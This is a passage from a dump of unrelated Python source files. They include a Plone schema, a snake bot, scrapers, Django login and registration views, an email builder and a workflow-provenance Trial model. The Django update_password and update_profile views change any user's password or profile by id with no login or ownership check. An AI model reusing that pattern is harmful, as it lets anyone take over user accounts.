IUserDataSchema\nfrom emas.theme import MessageFactory as _\n\nroles = SimpleVocabulary([\n    SimpleTerm(value=u'Learner', title=_(u'Learner')),\n    SimpleTerm(value=u'Educator', title=_(u'Educator')),\n    SimpleTerm(value=u'Curriculum specialist',\n               title=_(u'Curriculum specialist')),\n    SimpleTerm(value=u'Other', title=_(u'Other'))\n    ])\n\nprovinces = SimpleVocabulary([\n    SimpleTerm(value=u'Eastern Cape', title=_(u'Eastern Cape')),\n    SimpleTerm(value=u'Free State', title=_(u'Free State')),\n    SimpleTerm(value=u'Gauteng', title=_(u'Gauteng')),\n    SimpleTerm(value=u'KwaZulu-Natal', title=_(u'KwaZulu-Natal')),\n    SimpleTerm(value=u'Limpopo', title=_(u'Limpopo')),\n    SimpleTerm(value=u'Mpumalanga', title=_(u'Mpumalanga')),\n    SimpleTerm(value=u'Northern Cape', title=_(u'Northern Cape')),\n    SimpleTerm(value=u'North West', title=_(u'North West')),\n    SimpleTerm(value=u'Western Cape', title=_(u'Western Cape')),\n    ])\n\naccess_types = SimpleVocabulary([\n    SimpleTerm(value=u'maths-grade-10', title=_(u'Maths grade 10')),\n    SimpleTerm(value=u'maths-grade-11', title=_(u'Maths grade 11')),\n    SimpleTerm(value=u'maths-grade-12', title=_(u'Maths grade 12')),\n    SimpleTerm(value=u'science-grade-10', title=_(u'Science grade 10')),\n    SimpleTerm(value=u'science-grade-11', title=_(u'Science grade 11')),\n    SimpleTerm(value=u'science-grade-12', title=_(u'Science grade 12')),\n    ])\n\nclass IEmasUserDataSchema(IUserDataSchema):\n    # Credits stored as an integer\n    credits = Int(\n        title=_(u'questions', default=u'Questions'),\n        description=_(u'help_questions',\n                      default=u\"Question balance for Expert Answers service\"),\n        default=0,\n        required=False)\n\n    userrole = Choice(\n        title=_(u\"Role\"),\n        vocabulary=roles,\n        required=False,\n    )\n\n    school = TextLine(\n        title=_(u'label_school', default=u'School Name'),\n        required=False,\n        default=u\"\",\n    )\n\n    province = Choice(\n        title=_(u\"label_province\", default=u'Province'),\n        vocabulary=provinces,\n        required=False,\n    )\n\n    trialuser = Bool(\n        title=_(u'label_trialuser', default=u'Trial User'),\n        required=True,\n        default=True,\n    )\n\n    askanexpert_registrationdate = Date(\n        title=_(u\"label_askanexpert_registrationdate\",\n                default=\"Ask an expert - registration date.\"),\n        required=False,\n    )\n\n    answerdatabase_registrationdate = 
Date(\n        title=_(u\"label_answerdatebase_registrationdate\",\n                default=\"Answer database - registration date.\"),\n        required=False,\n    )\n\n    moreexercise_registrationdate = Date(\n        title=_(u\"label_moreexercise_registrationdate\",\n                default=\"More exercise - registration date.\"),\n        required=False,\n    )\n\n    answerdatabase_expirydate = Date(\n        title=_(u\"label_answerdatebase_expirydate\",\n                default=\"Answer database - expiry date.\"),\n        required=False,\n    )\n\n    moreexercise_expirydate = Date(\n        title=_(u\"label_moreexercise_expirydate\",\n                default=\"More exercise - expiry date.\"),\n        required=False,\n    )\n\n    intelligent_practice_access = List(\n        title=_(u\"label_intelligent_practice_access\",\n                default=\"Intelligent practice access.\"),\n        value_type = Choice(vocabulary=access_types),\n        required=False,\n    )\n    \n    subscribe_to_newsletter = Bool(\n        title=_(u'label_subscribe_to_newsletter',\n                default=u'Subscribe to the newsletter.'),\n        required=False,\n        default=True,\n    )\n\n\nclass UserDataSchemaProvider(object):\n    implements(IUserDataSchemaProvider)\n\n    def getSchema(self):\n        return IEmasUserDataSchema\n","sub_path":"emas/theme/userdataschema.py","file_name":"userdataschema.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"11273951","text":"from greent.graph_components import KNode\nfrom greent.synonymizers.oxo_synonymizer import synonymize\nfrom greent.conftest import rosetta\nfrom greent import node_types\n\ndef test_neuron(rosetta):\n    node = KNode(\"CL:0000540\", type=node_types.CELL)\n    synonymize(node,rosetta.core)\n    assert len(node.synonyms) > 10\n    # we're no longer so pathological about trying to get mesh IDs, so in this case we don't get one\n    meshcell = node.get_synonyms_by_prefix(\"MESH\")\n    assert len(meshcell) == 0\n    # But we should get a UMLS\n    umlscell = node.get_synonyms_by_prefix(\"UMLS\")\n    mid = list(umlscell)[0]\n    assert mid == 'UMLS:C0027882'\n\ndef test_phenotype(rosetta):\n    node = KNode(\"MEDDRA:10014408\", type=node_types.PHENOTYPE)\n    synonymize(node,rosetta.core)\n    assert len(node.synonyms) > 10\n    hpsyns = node.get_synonyms_by_prefix(\"HP\")\n    assert len(hpsyns) > 0\n    print(hpsyns)\n\ndef test_names(rosetta):\n    node = KNode('HP:0002527', type=node_types.PHENOTYPE, name='Falls')\n    synonymize(node,rosetta.core)\n    print( node.synonyms )\n    msyns = node.get_labeled_ids_by_prefix(\"MedDRA\")\n    assert len(msyns) == 1\n    ms = msyns.pop()\n    assert ms.identifier == 'MedDRA:10016173'\n    assert ms.label == 'Fall'\n\n","sub_path":"greent/test/test_oxo_synonmizer.py","file_name":"test_oxo_synonmizer.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"433245662","text":"from AlbotOnline.Snake.SnakeGame import SnakeGame\nimport random\nimport time\n\ngame = SnakeGame() #Connects you to the Client\nturn = 0\n\ndef getOkeyMoves(simBoard):\n    playerMoves, enemyMoves = game.getPossibleMoves(simBoard)\n    newPlayerMoves = playerMoves[:]\n    newEnemyMoves = enemyMoves[:]\n\n    for move in playerMoves:\n        nextBoard = game.simulateMove(simBoard, move, random.choice(enemyMoves))  # simulate from the given board, not the global one\n        if(game.evaluateBoard(nextBoard) == 'enemyWon' or game.evaluateBoard(nextBoard) == 'draw'):\n            newPlayerMoves.remove(move)\n\n    for move in enemyMoves:\n        nextBoard = game.simulateMove(simBoard, random.choice(playerMoves), move)\n\n        if(game.evaluateBoard(nextBoard) == 'playerWon' or game.evaluateBoard(nextBoard) == 'draw' ):\n            newEnemyMoves.remove(move)\n\n    # if 
no safe moves remain (a dead end), fall back to a default move\n    if not newPlayerMoves:\n        print(\"-----\")\n        newPlayerMoves.append('down')\n\n\n    if not newEnemyMoves:\n        print(\"-----\")\n        newEnemyMoves.append('down')\n\n    # print(newEnemyMoves)\n    # print(newPlayerMoves)\n\n    return newPlayerMoves, newEnemyMoves\n\n\ndef PlayFullGame(simBoard):\n    while(game.evaluateBoard(simBoard) == \"ongoing\"):\n        playerMoves, enemyMoves = getOkeyMoves(simBoard)\n        simBoard = game.simulateMove(simBoard, random.choice(playerMoves), random.choice(enemyMoves))\n    return game.evaluateBoard(simBoard)\n\ndef MakePredictions(board, playerMoves, enemyMoves, thinkTime, stats):\n    for j, move in enumerate(playerMoves):\n        won = 0\n        for _ in (range(thinkTime)):\n            result = PlayFullGame(game.simulateMove(board, move, random.choice(enemyMoves)))\n            if result == 'playerWon':\n                won = won + 1\n        stats[j] = stats[j] + won\n\n    return stats\n\n#\nwhile(game.awaitNextGameState() == \"ongoing\"):\n    print(\"-----------------------------\")\n    start_time = time.time()\n    turn_time = 0\n\n    turn = turn + 1\n    board = game.currentBoard\n    thinkTime = 30\n\n    numberOfSims = 0\n\n\n    #Simulate games <<-\n    playerMoves, enemyMoves = getOkeyMoves(board)\n    game.makeMove(playerMoves[0])\n\n    stats = []\n    for i in playerMoves:\n        stats.append(0)\n\n    # start_time = time.time()\n    # stats = MakePredictions(board, playerMoves, enemyMoves, thinkTime, stats)\n    # best_move = playerMoves[stats.index(max(stats))]\n    # game.makeMove(best_move)\n    # end_time = time.time()\n    #\n    # numberOfSims = (thinkTime * 3) ##\n\n    turn_time = time.time() - start_time\n\n    while(turn_time < 2.8):\n        #print(turn_time)\n        #start_time = time.time()\n        stats = MakePredictions(board, playerMoves[:], enemyMoves[:], int(1), stats)\n        numberOfSims = numberOfSims + (3 * int(thinkTime/3))\n        # print(\"Number of sims = \",numberOfSims)\n        #print(\"Stats \", stats)\n        best_move = playerMoves[stats.index(max(stats))]\n\n        game.makeMove(best_move)\n        #end_time = time.time()\n        #print(end_time-start_time)\n        turn_time = time.time() - start_time\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"236627223","text":"from bs4 import BeautifulSoup\nimport requests\n\nrequest = requests.get(\"https://www.empireonline.com/movies/features/best-movies-2/\")\ncontent = request.text\n\nsoup = BeautifulSoup(content, \"html.parser\")\n\nmovies_list_elem = soup.find_all(name=\"h3\", class_=\"jsx-4245974604\")\nprint(movies_list_elem)","sub_path":"Day 45/Final Project - 100 Top Movies Scraping/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"324298523","text":"from typing import List, Dict, Any, Tuple\nfrom postal.parser import parse_address\nfrom transformers import Pipeline, pipeline\n\nfrom extractors.extracting_tasks import NERExtractingTask\n\n\nclass LocationExtractor(NERExtractingTask):\n    model = 'xlm-roberta-large-finetuned-conll03-german'\n    tokenizer = 'xlm-roberta-large-finetuned-conll03-german'\n    type_mappings = {\n        'po_box': 'poBox',\n        'postcode': 'zip',\n        'house_number': 'street_house_number',\n        'road': 'street_road',\n        'unit': 'street2_unit',\n        'level': 'street2_level',\n        'staircase': 'street2_staircase',\n        'entrance': 'street2_entrance',\n        'house': 'street2_house',\n        'category': 'street2_category',\n        'near': 'street2_near',\n        'suburb': 'city_suburb',\n        'city_district': 
'city_city_district',\n 'city': 'city_city',\n 'state': 'state',\n 'state_district': 'state',\n 'country': 'country'\n }\n\n def _extract(self):\n ner_pipeline: Pipeline = pipeline('ner', model=self.model, tokenizer=self.tokenizer, grouped_entities=True)\n extracted: List[Dict[str, Any]] = []\n\n for line_index, line in self.lines.items():\n entities = ner_pipeline(line)\n\n delete: List[int] = []\n\n for index in range(len(entities)):\n if entities[index]['score'] < 0.9:\n delete.append(index)\n\n for index in sorted(delete, reverse=True):\n del entities[index]\n\n print(line)\n print(entities)\n\n if any(entity.get('entity_group') == 'LOC' for entity in entities):\n locations: List[Tuple[str, str]] = parse_address(line)\n\n print(locations)\n\n for location in locations:\n if location[1] in self.type_mappings:\n extracted.append({\n 'type': self.type_mappings[location[1]],\n 'match': location[0],\n 'index': line_index\n })\n\n print(f'Locations: {extracted}')\n\n return extracted\n\n\nif __name__ == '__main__':\n le = LocationExtractor({1: 'P.O.Box 2000'})","sub_path":"extractors/location_extractor.py","file_name":"location_extractor.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247048084","text":"class Solution:\n def partition(self, s):\n ans = []\n if not s: return ans\n def isPalindrome(s):\n return s == s[::-1]\n if isPalindrome(s): ans.append([s])\n for i in range(1, len(s)):\n ns = s[0:i]\n if isPalindrome(ns):\n tans = self.partition(s[i:])\n if len(tans) > 0:\n for each in tans:\n lll = [ns]\n lll.extend(each)\n ans.append(lll)\n return ans\n","sub_path":"algorithm/leetcode/problems/131-Palindrome-Partitioning.py","file_name":"131-Palindrome-Partitioning.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"114482316","text":"import webbrowser as web\nimport time\n\nurl = 'www.google.com'\n\ndef chrome(url):\n chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n google= web.get(chrome_path)\n google.open(url)\n\ndef explore(url):\n ie= web.get(web.iexplore)\n ie.open(url)\n\nimport urllib.request\nfrom time import time\n\ndef aa():\n url = 'www.google.com'\n explore='C:/Program Files (x86)/Internet Explorer/iexplore.exe %s'\n stream= web.get(explore)\n start_time = time()\n stream.open(url)\n end_time = time()\n\n print(end_time-start_time)\n print(\"aa\",round(end_time-start_time, 3))\n#aa()\n\ndef bb():\n url = 'www.google.com'\n chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n stream= web.get(chrome_path)\n dizi=[]\n for i in range(10):\n start_time = time()\n stream.open(url)\n end_time = time()\n dizi.append(round(end_time-start_time, 3))\n print(dizi)\n\nimport time\nfrom selenium import webdriver\ndef ddd():\n driver = webdriver.Chrome(executable_path=r\"C:\\Users\\Engin\\PycharmProjects\\untitled\\Yazılım Kalite\\chromedriver.exe\")\n start = time.time()\n driver.get('http://stackoverflow.com')\n end = time.time()\n print(end - start)\n driver.quit()\nddd()","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496375548","text":"import sys\nfrom Shell import Shell\n\ndef main(sysargv):\n shell = Shell()\n if sysargv[1] == 'shell':\n print(\n \"\"\"\n -init // initialize ***please 
start with this***\n            -cr <name> <priority>(=1 or 2) // create process\n            -de <name> // delete process\n            -req <resource> <# of units> // request resource\n            -rel <resource> <# of units> // release resource\n            -to // time out\n            -list  // list all info\n            -provide <process name> // provide info of a given process name\n            -q // quit shell\n            \"\"\"\n        )\n        while 1:\n            argv = input('coldplay@COLDPLAY$')\n            argv = argv.split(' ')\n            shell.run(argv)\n    elif sysargv[1] == 'test':\n        shell.test('input.txt')\n\nif __name__ == '__main__':\n    main(sys.argv)","sub_path":"操作系统实验/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"277897215","text":"from algo.forest.binary_tree_traversals import level_order\nfrom algo.forest.bst_check import create_valid_bst\nfrom algo.structures.binary_tree import BinaryTree\n\n\"\"\"\nGiven the root of a BST and 2 numbers min and max, trim the tree such that\nall the numbers in the new tree are between min and max (inclusive).\nThe resulting tree should still be a valid BST.\n\"\"\"\n\n\ndef trim_bst(root: BinaryTree, min_val, max_val):\n\n    def post_order_and_trim(node):\n        if not node:\n            return\n\n        node.left = post_order_and_trim(node.left)\n        node.right = post_order_and_trim(node.right)\n\n        if min_val <= node.key <= max_val:\n            return node\n\n        return node.right if node.key < min_val else node.left\n\n    # the root itself may be trimmed away, so return the (possibly new) root\n    return post_order_and_trim(root)\n\n\ntree = create_valid_bst()\n\nprint('before trim:')\nlevel_order(tree)\n\ntree = trim_bst(tree, 5, 13)\n\nprint('after trim:')\nlevel_order(tree)\n","sub_path":"algo-python/algo/forest/trim_bst.py","file_name":"trim_bst.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} {"seq_id":"620090489","text":"from django.shortcuts import render, get_object_or_404\nfrom . 
import forms\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout, views\nfrom .models import *\nfrom django.contrib.auth import logout\nfrom car_renting.models import Notification\n\n\n# Temporary workaround: the code used to read a non-existent lowercase\n# setting (settings defines STATIC_URL, not static_url), so the URLs are\n# hardcoded here until that is fixed.\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\n\ndef user_login(request):\n    fresh_form = forms.LoginForm()\n    if request.method == 'POST':\n        form = forms.LoginForm(request.POST)\n        if form.is_valid():\n            data = form.cleaned_data\n            user = authenticate(\n                username=data['email'], password=data['password'])\n            if user is not None:\n                if user.is_active:\n                    request.session['username'] = user.email\n                    login(request, user)\n                    return redirect('/car_renting/home')\n                else:\n                    context = {\n                        'with_status' : True,\n                        'title': 'Failed!!',\n                        'info' : 'account disabled',\n                        'static_url': STATIC_URL,\n                        'alert': 'alert-danger'\n                    }\n                    return render(request, 'login.html', context)\n            else:\n                context = {\n                    'with_status' : True,\n                    'title': 'Failed!!',\n                    'info' : 'invalid user name or password',\n                    'static_url': STATIC_URL,\n                    'alert': 'alert-danger'\n                }\n                return render(request, 'login.html', context)\n        else:\n            context = {\n                'with_status' : True,\n                'title': 'Failed!!',\n                'info' : 'invalid data provided',\n                'static_url': STATIC_URL,\n                'alert': 'alert-danger'\n            }\n            return render(request, 'login.html', context)\n    else:\n        static_url = STATIC_URL\n\n        # if user is authenticated bypass the login page\n        if request.user.is_authenticated:\n            return redirect('/car_renting/home')\n        \n        return render(request, 'login.html', {'form': fresh_form, 'static_url': static_url})\n\n\ndef user_logout(request):\n    if request.user.is_authenticated:\n        logout(request)\n        return redirect('/login')\n    else:\n        return redirect('/login')\n\ndef user_registration(request):\n\n    if request.method == 'POST':\n        form = forms.RegisterForm(request.POST)\n        if form.is_valid():\n            user = form.save(commit=False)\n            user.is_active = True\n            user.set_password(form.cleaned_data['password2'])\n            user.save()\n\n            new_user = UserProfile(user=user)\n            new_user.save()\n\n            context = {\n                'with_status' : True,\n                'title': 'Success',\n                'info' : 'you have successfully registered',\n                'alert': 'alert-success',\n                'static_url': STATIC_URL\n            }\n            return render(request, 'Registration/register.html', context)\n        else:\n            context = {\n                'with_status' : True,\n                'title': 'Failed',\n                'info' : 'Invalid data provided, please check your input',\n                'static_url': STATIC_URL,\n                'alert': 'alert-danger'\n            }\n            return render(request, 'Registration/register.html', context)\n    else:\n        form = forms.RegisterForm()\n        static_url = STATIC_URL\n        return render(request, 'Registration/register.html', {\"form\": form, 'static_url': static_url})\n\n\ndef settings(request):\n    if request.user.is_authenticated:\n        if request.method == \"GET\":\n            # check for unread notifications\n            notifications = Notification.notifications.filter(target__id=request.user.id).order_by('-created_at')\n            navbar_notifications = notifications.filter(is_viewed=False)\n\n            context = {\n                'user': request.user,\n                'view_type': 'settings',\n                'navbar_notifications': navbar_notifications,\n\n                'media': MEDIA_URL,\n                'static_url': STATIC_URL,\n                'form': forms.UserProfileUpdateForm\n            }\n            return render(request, 'home.html', context)\n\n        elif request.method == \"POST\":\n            form = forms.UserUpdateForm(request.POST, 
instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('/settings')\n else:\n return redirect('/settings')\n else:\n return redirect('/login')\n\n\ndef update_password(request, id):\n\n if request.method == \"POST\":\n user = get_object_or_404(CustomUser, pk=id)\n form = forms.Newpassword(request.POST, instance=user)\n if form.is_valid():\n user.set_password(form.cleaned_data['password2'])\n user.save()\n return redirect('/settings')\n else:\n return redirect('/settings')\n\n\ndef update_profile(request, id):\n\n if request.method == \"POST\":\n profile = get_object_or_404(UserProfile, pk=id)\n form = forms.UserProfileUpdateForm(request.POST, request.FILES, instance=profile)\n if form.is_valid():\n form.save()\n return redirect('/settings')\n else:\n print(form.data)\n return redirect('/settings')","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288708476","text":"import pyautogui as p\nimport time\n\ntry:\n\twhile True:\n\t\tx,y = p.position()\n\t\tpositionStr = 'X: ' + str(x).rjust(4) + 'Y: ' + str(y).rjust(4)\n\t\tprint(positionStr, end='')\n\t\tprint('\\b'* len(positionStr), end='', flush=True)\nexcept KeyboardInterrupt:\n\tprint(\"\\n Done!\")","sub_path":"moseNow.py","file_name":"moseNow.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"547403720","text":"import smtplib\nfrom jinja2 import Environment, PackageLoader\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE, make_msgid\nfrom odybcl2fastq import config\n\n\ndef generateMessageId():\n '''\n Creates a unique message id for the email message\n '''\n return make_msgid()\n\ndef composeMessage(message, subject, summary_data, fromaddr, toemaillist, template, ccemaillist=[], bccemaillist=[]):\n msg = MIMEMultipart()\n msg['Message-ID'] = generateMessageId()\n msg['From'] = fromaddr\n msg['To'] = COMMASPACE.join(toemaillist)\n msg['Subject'] = subject\n if len(ccemaillist) > 0:\n msg['Cc'] = COMMASPACE.join(ccemaillist)\n if len(bccemaillist) > 0:\n msg['Bcc'] = COMMASPACE.join(bccemaillist)\n if summary_data:\n html = get_html(summary_data, template)\n msg.attach(MIMEText(html, 'html'))\n else:\n if len(message) > 900000:\n message = message[-900000:]\n msg.attach(MIMEText(message, 'plain'))\n return msg\n\ndef buildmessage(message, subject, summary_data, fromaddr, toemaillist, template='summary.html', ccemaillist=[], bccemaillist=[], server=None):\n if not server:\n server = config.EMAIL['smtp']\n msg = composeMessage(message, subject, summary_data, fromaddr, toemaillist, template, ccemaillist=[], bccemaillist=[])\n emails = toemaillist + ccemaillist + bccemaillist\n smtp = smtplib.SMTP(server)\n success = smtp.sendmail(fromaddr, emails, msg.as_string())\n smtp.close()\n return success\n\n\ndef get_html(summary_data, template):\n # create html message with jinja\n j2_env = Environment(\n loader=PackageLoader('odybcl2fastq', 'templates'),\n trim_blocks=True\n )\n html = j2_env.get_template(template).render(summary_data)\n return html\n","sub_path":"odybcl2fastq/emailbuilder/emailbuilder.py","file_name":"emailbuilder.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139959524","text":"# Copyright 
(c) 2014 Universidade Federal Fluminense (UFF)\n# Copyright (c) 2014 Polytechnic Institute of New York University.\n# This file is part of noWorkflow.\n# Please, consult the license terms in the LICENSE file.\n\nfrom __future__ import (absolute_import, print_function,\n division, unicode_literals)\n\nimport sys\nfrom datetime import datetime\nfrom collections import defaultdict, OrderedDict, Counter\n\nfrom .. import utils\nfrom ..persistence import row_to_dict, persistence\nfrom .trial_activation_visitors import TrialGraphVisitor\nfrom .trial_activation_visitors import TrialGraphCombineVisitor\nfrom .trial_prolog import TrialProlog\nfrom .utils import calculate_duration, FORMAT\nfrom .activation import Activation\n\nclass Trial(object):\n \"\"\" This model represents a trial\n Initialize it by passing the trial id:\n trial = Trial(2)\n\n There are two visualization modes for the graph:\n exact match: calls are only combined when all the sub-call match\n trial.graph_type = 0\n combined: calls are combined without considering the sub-calls\n trial.graph_type = 1\n\n You can change the graph width and height by the variables:\n trial.graph_width = 600\n trial.graph_height = 400\n \"\"\"\n\n def __init__(self, trial_id, script=None, exit=False):\n if exit:\n last_trial_id = persistence.last_trial_id(script=script)\n trial_id = trial_id or last_trial_id\n if not 1 <= trial_id <= last_trial_id:\n utils.print_msg('inexistent trial id', True)\n sys.exit(1)\n\n self.id = trial_id\n self._info = None\n self.prolog = None\n self._graph_types = {\n 0: self.independent_activation_graph,\n 1: self.combined_activation_graph\n }\n self.graph_width = 500\n self.graph_height = 500\n self.graph_type = 0\n\n def init_prolog(self):\n # Todo: fix prolog\n if not self.prolog:\n from pyswip import Prolog\n self.prolog = Prolog()\n self.trial_prolog = TrialProlog(self)\n for fact in self.trial_prolog.export_facts(with_doc=False):\n self.prolog.assertz(fact[:-1])\n for rule in self.trial_prolog.export_rules().split('\\n'):\n rule = rule.strip()\n if not rule or rule[0] == '%':\n continue\n self.prolog.assertz(rule[:-1])\n\n def query(self, prolog):\n self.init_prolog()\n return self.prolog.query(prolog)\n\n def prolog_rules(self):\n self.init_prolog()\n return self.trial_prolog.export_rules().split('\\n')\n\n @property\n def trial_id(self):\n from warnings import warn\n warn('trial_id propery deprecated. Please use id')\n return self.id\n\n @property\n def script(self):\n \"\"\" Returns the \"main\" script of the trial \"\"\"\n info = self.info()\n return info['script']\n\n @property\n def code_hash(self):\n \"\"\" Returns the hash code of the main script \"\"\"\n info = self.info()\n return info['code_hash']\n\n def _ipython_display_(self):\n \"\"\" Displays d3 graph on ipython notebook \"\"\"\n from IPython.display import (\n display_png, display_html, display_latex,\n display_javascript, display_svg\n )\n import json\n import time\n\n uid = str(int(time.time()*1000000))\n display_html(\"\"\"\n
<div class=\"now-trial-graph\" id=\"graph-{0}\" style=\"width: {1}px; height: {2}px;\"></div>\n            <div>\n                <input type=\"checkbox\" id=\"showtooltips-{0}\" name=\"showtooltips\">\n                <label for=\"showtooltips-{0}\">Show tooltips</label>\n            </div>\n        
\"\"\".format(uid, self.graph_width, self.graph_height), raw=True)\n display_javascript(\"\"\"\n var trial_graph = now_trial_graph('#graph-{0}', {0}, {2}, {2}, {1}, {3}, {4}, \"#showtooltips-{0}\", {{\n custom_size: function() {{\n return [{3}, {4}];\n }}\n }});\n $( \"[name='showtooltips']\" ).change(function() {{\n trial_graph.set_use_tooltip(d3.select(\"#showtooltips-{0}\").property(\"checked\"));\n }});\n \"\"\".format(\n uid,\n json.dumps(self._graph_types[self.graph_type]()),\n self.id, self.graph_width, self.graph_height), raw=True)\n\n def info(self):\n \"\"\" Returns dict with the trial information, considering the duration \"\"\"\n if self._info is None:\n self._info = row_to_dict(\n persistence.load_trial(self.id).fetchone())\n if self._info['finish']:\n self._info['duration'] = calculate_duration(self._info)\n return self._info\n\n def function_defs(self):\n \"\"\" Returns a dict of function definitions \"\"\"\n return {\n function['name']: row_to_dict(function)\n for function in persistence.load('function_def',\n trial_id=self.id)\n }\n\n def head_trial(self, remove=False):\n \"\"\" Returns the parent trial object \"\"\"\n parent_id = persistence.load_parent_id(self.script, remove=remove)\n return Trial(parent_id)\n\n def modules(self, map_fn=row_to_dict):\n \"\"\" Returns the modules imported during the trial\n The first element is a list of local modules\n The second element is a list of external modules\n \"\"\"\n dependencies = persistence.load_dependencies(self.id)\n result = map(map_fn, dependencies)\n local = [dep for dep in result\n if dep['path'] and persistence.base_path in dep['path']]\n return local, result\n\n def environment(self):\n \"\"\" Returns a dict of environment variables \"\"\"\n return {\n attr['name']: attr['value'] for attr in map(row_to_dict,\n persistence.load('environment_attr', trial_id=self.id))\n }\n\n def file_accesses(self):\n \"\"\" Returns a list of file accesses \"\"\"\n file_accesses = persistence.load('file_access',\n trial_id=self.id)\n\n result = []\n for fa in map(row_to_dict, file_accesses):\n stack = []\n function_activation = next(iter(self.activations(\n id=fa['function_activation_id'])))\n while function_activation:\n function_name = function_activation['name']\n try:\n function_activation = next(iter(self.activations(\n id=function_activation['caller_id'])))\n stack.insert(0, function_name)\n except StopIteration:\n function_activation = None\n if not stack or stack[-1] != 'open':\n stack.append(' ... 
-> open')\n\n result.append({\n 'id': fa['id'],\n 'function_activation_id': fa['function_activation_id'],\n 'name': fa['name'],\n 'mode': fa['mode'],\n 'buffering': fa['buffering'],\n 'content_hash_before': fa['content_hash_before'],\n 'content_hash_after': fa['content_hash_after'],\n 'timestamp': fa['timestamp'],\n 'stack': ' -> '.join(stack),\n })\n return result\n\n def activations(self, **conditions):\n \"\"\" Returns a list of activations \"\"\"\n return map(Activation, persistence.load('function_activation',\n trial_id=self.id,\n order='start',\n **conditions))\n\n def slicing_variables(self):\n \"\"\" Returns a list of slicing variables \"\"\"\n return persistence.load('slicing_variable',\n trial_id=self.id,\n order='vid ASC')\n\n def slicing_usages(self):\n \"\"\" Returns a list of slicing usages \"\"\"\n return persistence.load('slicing_usage',\n trial_id=self.id)\n\n def slicing_dependencies(self):\n \"\"\" Returns a list of slicing dependencies \"\"\"\n return persistence.load('slicing_dependency',\n trial_id=self.id)\n\n def activation_graph(self):\n \"\"\" Generates an activation graph \"\"\"\n result_stack = []\n stack = [Single(act) for act in self.activations()]\n\n if not stack:\n return TreeElement()\n\n result_stack.append(stack.pop())\n while stack:\n next = result_stack.pop()\n previous = stack.pop()\n add_flow(stack, result_stack, previous, next)\n\n return result_stack.pop()\n\n def independent_activation_graph(self):\n \"\"\" Generates an activation graph and transforms it into an\n exact match graph supported by d3 \"\"\"\n graph = self.activation_graph()\n visitor = TrialGraphVisitor()\n graph.visit(visitor)\n return visitor.to_dict()\n\n def combined_activation_graph(self):\n \"\"\" Generates an activation graph and transforms it into an\n combined graph supported by d3 \"\"\"\n graph = self.activation_graph()\n visitor = TrialGraphCombineVisitor()\n graph.visit(visitor)\n return visitor.to_dict()\n\n\nclass TreeElement(object):\n\n def __init__(self):\n self.duration = 0\n self.count = 1\n self.repr = \"\"\n\n def mean(self):\n if isinstance(self.duration, tuple):\n return (self.a.duration / self.a.count,\n self.b.duration / self.b.count)\n return self.duration / self.count\n\n def visit(self, visitor):\n return visitor.visit_default(self)\n\n def calculate_repr(self):\n pass\n\n def mix(self, other):\n pass\n\n def __hash__(self):\n #return id(self)\n return hash(self.__repr__())\n\n def __repr__(self):\n return self.repr\n\n\nclass Single(TreeElement):\n\n def __init__(self, activation):\n self.activation = activation\n self.activations = {activation}\n self.parent = activation['caller_id']\n self.id = activation['id']\n self.line = activation['line']\n self.name = activation['name']\n self.trial_id = activation['trial_id']\n self.repr = \"S({0}-{1})\".format(self.line, self.name)\n\n @property\n def count(self):\n return sum(1 for a in self.activations)\n\n @count.setter\n def count(self, value):\n pass\n\n @property\n def duration(self):\n return sum(calculate_duration(a) for a in self.activations\n if a['finish'] and a['start'])\n\n @duration.setter\n def duration(self, value):\n pass\n\n def mix(self, other):\n self.count += other.count\n self.duration += other.duration\n self.activations = self.activations.union(other.activations)\n\n def __eq__(self, other):\n if type(self) != type(other):\n return False\n if self.line != other.line:\n return False\n if self.name != other.name:\n return False\n return True\n\n def name_id(self):\n return \"{0} 
